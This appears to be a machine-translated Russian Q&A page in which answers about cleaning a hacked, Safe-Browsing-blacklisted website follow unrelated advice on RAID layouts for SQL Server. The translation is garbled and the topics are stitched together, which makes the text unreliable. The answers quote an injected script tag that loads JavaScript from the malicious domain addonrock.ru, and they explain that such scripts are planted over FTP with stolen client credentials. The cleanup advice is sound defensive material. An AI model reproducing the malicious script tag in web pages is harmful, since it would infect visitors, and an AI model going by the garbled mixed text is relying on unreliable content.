Страница Нападения, о которой сообщают: как разрешить эту проблему
Необходимо использовать RAID 1 или 10, если дисковое пространство не является основной проблемой, потому что они намного быстрее, чем RAID 5, специально для записей; также, RAID 5 довольно бесполезен только с 3 дисками, это становится все более полезным большее, которое получают массивы.
Я также избегал бы использования единственного диска ненабега для tempdb: если это повредится, то Вы ничего не потеряете, но Ваш сервер снизится, пока Вы не сможете заменить его.
Я настроил бы диски в 3 RAID 1 объем 2 дисков каждый, один для данных, один для журналов транзакций и один для tempdb; это оставляет диск, который можно использовать для RAID том резервного копирования или как глобальное горячее резервирование; я постарался бы не делать объем данных RAID 5 один, поскольку это сделает его медленнее.
Если Вы нуждаетесь в большем пространстве данных и можете справиться с потерей tempdb, можно использовать 4 диска в RAID 10 для данных, 2 диска в RAID 1 для журналов транзакций и одном отдельном диске для tempdb.
Вам вряд ли будут нужны больше чем 2 RAID 1 диск для журналов транзакций: они не должны расти слишком много, если Вы создаете резервную копию их регулярно; и Вы должны.
Ваш веб-сайт был помещен в черный список просмотром Google Safe. Это интегрируется в Firefox, Safari и Chrome (не Internet Explorer).
Сначала проверьте то, что Google Safe Browsing говорит о Вашем домене на диагностической странице:
Malicious software is hosted on 1 domain(s), including addonrock.ru/
Так, где-нибудь, у Вас есть ссылка на этот домен. Действительно, на всех Ваших страницах, Вы найдете это в конце кода, после </HTML> тег:
<script type="text/javascript" src="http://addonrock.ru/Java.js"></script>
Вы - веб-приложение, был взломан! При использовании приложения с открытым исходным кодом проверьте, работаете ли Вы, последняя версия (проверьте плагины также). Может быть известная уязвимость.
Вот то, что сделать затем:
- поймите, как Ваш сайт был взломан: известная уязвимость в приложении, проблеме с Вашим поставщиком услуг хостинга, уязвимостью в Вашем коде (удаленное включение файла, и т.д.), и т.д.
- заткните дыру: обновите свое приложение, исправьте Ваш собственный код и т.д.
- проверьте все свои файлы и базы данных для любого вредоносного кода
- восстановите безопасное резервное копирование
Шаг 4 в порядке, если Вы уверены, что взломщики не оставили бэкдора. Конечно, Вы никогда не можете быть на 100% уверены.... Если у Вас есть достаточно времени и денег, используйте новый сервер для хостинга веб-сайта.
Ну, предположение, что Вы сознательно не распределяете вредоносное программное обеспечение, моя ставка, состоит в том, что Вы были взломаны, и или вирусы или вредоносное программное обеспечение распределяются с Вашего веб-сайта.
Эта страница имеет детали о том, что продолжается.
Удалите все и восстановление от известного - хорошее резервное копирование.
Сценарии из addonrock.ru и alienradar.ru вставляются через FTP.
Некоторое вредоносное программное обеспечение Windows поднимает информацию о входе в систему FTP с Filezilla и других общих клиентов FTP.
Так в основном:
1) Уберите свою клиентскую машину. 2) Измените все пароли на сервере. 3) Замените все зараженные файлы. Если у Вас нет доступа к журналу, просто замените всех их.